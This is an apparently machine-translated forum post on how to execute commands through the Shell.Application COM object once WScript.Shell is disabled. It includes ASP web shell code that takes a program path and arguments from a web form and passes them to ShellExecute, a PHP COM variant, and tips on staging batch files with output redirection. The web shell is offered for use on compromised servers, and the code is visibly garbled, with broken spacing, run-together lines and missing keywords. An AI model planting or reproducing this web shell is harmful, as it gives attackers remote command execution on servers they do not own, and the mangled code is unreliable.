When the wscript. shell component is disabled, you can use Shell. Application to execute the command.

The wscript. shell and shell. application components are used to execute the program. Therefore, they are the least secure component. Currently, many asp Trojans use wscript. shell to execute commands, ignoring shell. application. We can first upload a bat file in a directory with the running permission, and write the command we want to run in it. Then call the shell. application Component to run the bat. ECHO can use the redirection symbol> in bat to access a text file. You just need to read the file according to the command result. Of course, you can also directly call cmd to execute the command. If you do not want to bring it back, use redirection to view it. The test is successful under XP.

<% On Error Resume NextDim theFile, thePath, appPath, appName, appArgsappPath = Trim (Request ("appPath") appName = Trim (Request ("appName ")) appArgs = Trim (Request ("appArgs") If appName = "" ThenappName = "cmd.exe" End If appPath <> "" And Right (appPath, 1) <> "\" ThenappPath = appPath & "\" End If LCase (appName) = "cmd.exe" And appArgs <> "" ThenIf LCase (Left (appArgs, 2 )) <> "/c" ThenappArgs = "/c" & appArgsEnd IfElseIf LCase (appName) = "cmd.exe" And appArgs = "" ThenappArgs = "/c" End IfEnd IfSet objShellApp = CreateObject ("Shell. application ") objShellApp. shellExecute appName, appArgs, appPath, "", 0%> <form method = post onSubmit = 'this. submit. disabled = true '> path: <input name = appPath type = text id = appPath value = "" & HtmlEncode (appPath) & "" size = 62> <br/> program file: <input name = appName type = text id = appName value = "& HtmlEncode (appName) & "" size = 62> <br/> command parameter: <input name = appArgs type = text id = appArgs value = "& HtmlEncode (appArgs) & "" size = 62> <input type = submit name = Submit value = 'run'> <br/> 
 
I tried it today. You can also use open. The php code is as follows. It seems that I haven't seen any relevant methods in the php webshell.
<? Php $ wsh = new COM ('Shell. application ') or die ("Shell. application "); $ exec = $ wsh-> open (" c: \ windows \ system32 \ notepad.exe "); // no echo, multiple notepad processes are added, you can write a batch to run the doscommand. You can use ShellExecute for open. ?>